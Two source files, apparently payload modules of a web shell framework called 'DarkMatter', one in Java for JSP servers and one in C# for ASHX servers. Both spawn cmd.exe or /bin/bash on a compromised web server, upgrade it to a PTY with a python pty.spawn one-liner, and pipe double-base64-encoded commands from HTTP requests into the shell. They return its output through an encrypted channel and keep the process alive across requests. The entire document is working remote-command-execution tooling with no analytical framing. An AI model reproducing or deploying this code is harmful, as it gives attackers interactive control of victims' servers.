File: Payload/JSP/NebulaPulsar/DarkMatter/shell_virtual.java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class shell_virtual extends ClassLoader
{
    public shell_virtual(ClassLoader objParent) { super(objParent); }
    public shell_virtual() { super(shell_virtual.class.getClassLoader()); }
    
    private Map<String, String> fnParseParams(String szParamStr)
    {
        Map<String, String> mapParams = new HashMap<String, String>();
        if (szParamStr == null || szParamStr.trim().isEmpty())
            return mapParams;

        String[] aszPairs = szParamStr.split("&");
        for (String szPair : aszPairs)
        {
            int nIdx = szPair.indexOf("=");
            if (nIdx > 0)
            {
                mapParams.put(szPair.substring(0, nIdx), szPair.substring(nIdx + 1));
            }
        }
        return mapParams;
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult)
    {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();

        Object objPageContext = objParam;

        try
        {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try
            {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            }
            catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        }
        catch (Exception exIgnored)
        {

        }
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse)
    {
        try
        {
            if (objPageContext == null)
                return abRawResponse;

            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            
            if (objPulsarLoader == null)
                return abRawResponse;

            java.lang.reflect.Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);

            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        }
        catch (Exception exCrashed)
        {
            return abRawResponse;
        }
    }

    @Override
    public boolean equals(Object objParam)
    {
        Object objPageContext = objParam;
        Object objRequest = null;
        Object objResponse = null;
        OutputStream osClient = null;

        try
        {
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);

            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPayload = fnGetAttribute.invoke(objRequest, new Object[]{"payload"});
            Object objLength = fnGetAttribute.invoke(objRequest, new Object[]{"len"});

            if (objPayload == null || objLength == null)
            {
                osClient.write("PAYLOAD_ERROR: Missing attributes from request.".getBytes());
                return true;
            }

            byte[] abPayload = (byte[])objPayload;
            int nClassLength = Integer.parseInt(objLength.toString());
            int nParamOffset = nClassLength + 4;
            int nParamLength = abPayload.length - nParamOffset;
            String szParam = new String(abPayload, nParamOffset, nParamLength, "UTF-8").trim();

            Map<String, String> mapParams = fnParseParams(szParam);
            StringBuilder sb = new StringBuilder();

            Method fnGetSession = objPageContext.getClass().getMethod("getSession", new Class[0]);
            Object objSession = fnGetSession.invoke(objPageContext, new Object[0]);
            Method fnSessGetAttribute = objSession.getClass().getMethod("getAttribute", String.class);
            Method fnSessSetAttribute = objSession.getClass().getMethod("setAttribute", new Class[]{String.class, Object.class});
            Method fnSessRemoveAttribute = objSession.getClass().getMethod("removeAttribute", new Class[]{String.class});

            String szType = new String(Base64.getDecoder().decode(mapParams.get("z0")));
            String szJSON = "{\"status\":\"%s\",\"msg\":\"%s\"}";

            if (szType.equalsIgnoreCase("create"))
            {
                try
                {
                    String szOS = System.getProperty("os.name").toLowerCase().toString();
                    boolean bIsWindows = szOS.contains("win");
                    String szShellCmd = mapParams.containsKey("z1") ? new String(Base64.getDecoder().decode(mapParams.get("z1"))) : (bIsWindows ? "cmd.exe" : "/bin/bash");

                    if (!bIsWindows)
                    {
                        // Unix-like
                        szShellCmd = String.format("python3 -c 'import pty; pty.spawn(\"%s\")'", szShellCmd);
                    }

                    ProcessBuilder pb = new ProcessBuilder(szShellCmd.split(" "));
                    pb.redirectErrorStream(true);

                    var process = pb.start();
                    var outputBuffer = new ByteArrayOutputStream();

                    fnSessSetAttribute.invoke(objSession, new Object[] { "shell_proc", process });
                    fnSessSetAttribute.invoke(objSession, new Object[] { "shell_in", process.getOutputStream() });
                    fnSessSetAttribute.invoke(objSession, new Object[] { "shell_out_buf", outputBuffer });

                    Thread readThread = new Thread(() -> {
                        try {
                            java.io.InputStream is = process.getInputStream();
                            byte[] bytes = new byte[4096];
                            int readLen = 0;

                            while ((readLen = is.read(bytes)) != -1) {
                                outputBuffer.write(bytes, 0, readLen);
                            }
                        } catch (java.io.IOException e) {
                            e.printStackTrace(); 
                        }
                    });

                    readThread.start();

                    szJSON = String.format(szJSON, "success", "Java Multi-thread Engine spawned in memory safely.");

                }
                catch (Exception ex)
                {
                    szJSON = String.format(szJSON, "failed", ex.getMessage());
                }

                sb.append(szJSON);
            }
            else if (szType.equalsIgnoreCase("write"))
            {
                OutputStream osStream = (OutputStream)fnSessGetAttribute.invoke(objSession, new Object[] {"shell_in"});
                
                if (osStream != null)
                {
                    try
                    {
                        String szShellCmd = new String(Base64.getDecoder().decode(mapParams.get("z1")));
                        szShellCmd = new String(Base64.getDecoder().decode(szShellCmd));
                        var cmdBytes = szShellCmd.getBytes();

                        osStream.write(cmdBytes);
                        osStream.flush();

                        szJSON = String.format(szJSON, "success", "Input stream piped directly");
                    }
                    catch (Exception ex)
                    {
                        szJSON = String.format(szJSON, "failed", ex.getMessage());
                    }
                }

                sb.append(szJSON);
            }
            else if (szType.equalsIgnoreCase("read"))
            {
                ByteArrayOutputStream outputBuffer = (ByteArrayOutputStream)fnSessGetAttribute.invoke(objSession, new Object[] {"shell_out_buf"});

                if (outputBuffer != null)
                {
                    var currentBytes = outputBuffer.toByteArray();
                    outputBuffer.reset();

                    var b64Output = Base64.getEncoder().encodeToString(currentBytes);
                    szJSON = String.format(szJSON, "success", b64Output);
                }
                else
                {
                    szJSON = String.format(szJSON, "failed", "No active channel buffer found.");
                }

                sb.append(szJSON);
            }
            else if (szType.equalsIgnoreCase("stop"))
            {
                Process process = (Process)fnSessGetAttribute.invoke(objSession, new Object[] {"shell_proc"});
                if (process != null)
                {
                    try
                    {
                        process.destroyForcibly();
                    }
                    catch (Exception e) { }
                }

                fnSessRemoveAttribute.invoke(objSession, new Object[] {"shell_proc"});
                fnSessRemoveAttribute.invoke(objSession, new Object[] {"shell_in"});
                fnSessRemoveAttribute.invoke(objSession, new Object[] {"shell_out_buf"});

                szJSON = String.format(szJSON, "stop", "Engine shutdown successfully.");
                sb.append(szJSON);
            }

            String szOutput = sb.toString();
            fnWriteOutput(objParam, objResponse, osClient, szOutput.getBytes());
        }
        catch (Exception ex)
        {
            if (osClient != null)
            {
                try
                {
                    StringWriter swTrace = new StringWriter();
                    ex.printStackTrace(new PrintWriter(swTrace));

                    osClient.write(("DARKMATTER_INTERNAL_CRASHED: " + swTrace.toString()).getBytes());
                }
                catch (Exception exIgnored) {}
            }
        }

        return true;
    }
}

File: Payload/ASHX/NebulaPulsar/DarkMatter/shell_virtual.cs
using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Collections.Generic;
using System.Threading;

public class shell_virtual
{
    private Dictionary<string, string> fnParseParams(string szParam)
    {
        Dictionary<string, string> dic = new Dictionary<string, string>();
        if (string.IsNullOrEmpty(szParam)) return dic;

        string[] pairs = szParam.Split('&');
        foreach (string szPair in pairs)
        {
            int nIdx = szPair.IndexOf("=");
            if (nIdx > 0)
                dic[szPair.Substring(0, nIdx).Trim()] = szPair.Substring(nIdx + 1).Trim();
        }
        return dic;
    }

    private string fnB64Encode(string szInput) => Convert.ToBase64String(Encoding.UTF8.GetBytes(szInput));
    private string fnB64Decode(string szInput) => Encoding.UTF8.GetString(Convert.FromBase64String(szInput));

    private void fnWriteOutput(object driver, HttpResponse response, byte[] abOutput)
    {
        var cryptMethod = driver.GetType().GetMethod("Crypt", new Type[] { typeof(byte[]), typeof(int) });
        byte[] abEncryptedResp = (byte[])cryptMethod.Invoke(driver, new object[] { abOutput, 1 });

        response.Clear();
        response.ContentType = "application/octet-stream";
        response.BinaryWrite(abEncryptedResp);
    }

    public bool Run()
    {
        HttpContext context = HttpContext.Current;
        if (context == null) return false;

        HttpRequest request = context.Request;
        HttpResponse response = context.Response;

        try
        {
            byte[] abPayload = (byte[])context.Items["payload"];
            object driver = context.Items["driver"];
            
            int nDllLength = 0;
            if (context.Items["len"] != null)
            {
                int.TryParse(context.Items["len"].ToString(), out nDllLength);
            }

            int nParamOffset = nDllLength + 4;
            int nParamLength = abPayload.Length - nParamOffset;
            string szParam = Encoding.UTF8.GetString(abPayload, nParamOffset, nParamLength).Trim();
            Dictionary<string, string> dic = fnParseParams(szParam);

            StringBuilder sb = new StringBuilder();
            
            string szType = fnB64Decode(dic["z0"]);

            string session_proc = "shell_proc_" + request.UserHostAddress;
            string session_in   = "shell_in_" + request.UserHostAddress;
            string session_buf  = "shell_out_buf_" + request.UserHostAddress;

            if (szType.Equals("create", StringComparison.OrdinalIgnoreCase))
            {
                try
                {
                    int nPlatformId = (int)Environment.OSVersion.Platform;
                    bool bIsWindows = nPlatformId != 4 && nPlatformId != 6 && nPlatformId != 128;
                    ProcessStartInfo startInfo = new ProcessStartInfo();

                    if (bIsWindows)
                    {
                        startInfo.FileName = "cmd.exe";
                    }
                    else
                    {
                        startInfo.FileName = "/bin/bash";
                        startInfo.EnvironmentVariables["TERM"] = "xterm";
                    }

                    startInfo.UseShellExecute = false;
                    startInfo.RedirectStandardInput = true;
                    startInfo.RedirectStandardOutput = true;
                    startInfo.RedirectStandardError = true;
                    startInfo.CreateNoWindow = true;

                    Process process = new Process();
                    process.StartInfo = startInfo;
                    process.Start();

                    MemoryStream ms = new MemoryStream();

                    HttpRuntime.Cache.Insert(session_proc, process, null, System.Web.Caching.Cache.NoAbsoluteExpiration, TimeSpan.FromMinutes(30));
                    HttpRuntime.Cache.Insert(session_in, process.StandardInput.BaseStream, null, System.Web.Caching.Cache.NoAbsoluteExpiration, TimeSpan.FromMinutes(30));
                    HttpRuntime.Cache.Insert(session_buf, ms, null, System.Web.Caching.Cache.NoAbsoluteExpiration, TimeSpan.FromMinutes(30));

                    Thread t = new Thread(() =>
                    {
                        try
                        {
                            Stream isStream = process.StandardOutput.BaseStream;
                            byte[] bytes = new byte[4096];
                            int readLen;
                            while ((readLen = isStream.Read(bytes, 0, bytes.Length)) > 0)
                            {
                                lock (ms)
                                {
                                    ms.Write(bytes, 0, readLen);
                                }
                            }
                        }
                        catch (Exception) {}
                    });
                    t.Start();

                    if (!bIsWindows)
                    {
                        Stream os = process.StandardInput.BaseStream;
                        string szShell = "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || python -c 'import pty; pty.spawn(\"/bin/bash\")'\n";
                        byte[] abRead = Encoding.UTF8.GetBytes(szShell);
                        os.Write(abRead, 0, abRead.Length);
                        os.Flush();
                    }

                    sb.Append("{\"status\":\"success\",\"msg\":\"PTY spawned and initialized successfully.\"}");
                }
                catch (Exception ex)
                {
                    sb.Append("{\"status\":\"failed\",\"msg\":\"" + ex.Message.Replace("\"", "\\\"") + "\"}");
                }
            }
            else if (szType.Equals("write", StringComparison.OrdinalIgnoreCase))
            {
                Stream osStream = HttpRuntime.Cache[session_in] as Stream;
                if (osStream != null)
                {
                    try
                    {
                        string z1Raw = dic.ContainsKey("z1") ? dic["z1"] : "";
                        string firstDecodeStr = Encoding.UTF8.GetString(Convert.FromBase64String(z1Raw));
                        byte[] szShellCmdBytes = Convert.FromBase64String(firstDecodeStr);

                        osStream.Write(szShellCmdBytes, 0, szShellCmdBytes.Length);
                        osStream.Flush();

                        sb.Append("{\"status\":\"success\",\"msg\":\"Bytes flushed to PTY stdin.\"}");
                    }
                    catch (Exception ex)
                    {
                        sb.Append("{\"status\":\"failed\",\"msg\":\"" + ex.Message.Replace("\"", "\\\"") + "\"}");
                    }
                }
                else
                {
                    sb.Append("{\"status\":\"failed\",\"msg\":\"No active stdin channel found.\"}");
                }
            }
            else if (szType.Equals("read", StringComparison.OrdinalIgnoreCase))
            {
                MemoryStream ms = HttpRuntime.Cache[session_buf] as MemoryStream;
                if (ms != null)
                {
                    byte[] currentBytes;
                    lock (ms)
                    {
                        currentBytes = ms.ToArray();
                        ms.SetLength(0);
                    }

                    string b64Output = Convert.ToBase64String(currentBytes);
                    sb.Append("{\"status\":\"success\",\"msg\":\"" + b64Output + "\"}");
                }
                else
                {
                    sb.Append("{\"status\":\"failed\",\"msg\":\"No active channel buffer found.\"}");
                }
            }
            else if (szType.Equals("stop", StringComparison.OrdinalIgnoreCase))
            {
                Process process = HttpRuntime.Cache[session_proc] as Process;
                if (process != null)
                {
                    try { process.Kill(); } catch (Exception) { }
                }

                HttpRuntime.Cache.Remove(session_proc);
                HttpRuntime.Cache.Remove(session_in);
                HttpRuntime.Cache.Remove(session_buf);

                sb.Append("{\"status\":\"stop\",\"msg\":\"Engine shutdown successfully.\"}");
            }

            string szOutput = sb.ToString(); 
            fnWriteOutput(driver, response, Encoding.UTF8.GetBytes(szOutput));

            context.ApplicationInstance.CompleteRequest();
        }
        catch (Exception ex)
        {
            response.Write("DARKMATTER_ERROR: " + ex.Message);
        }

        return true;
    }
}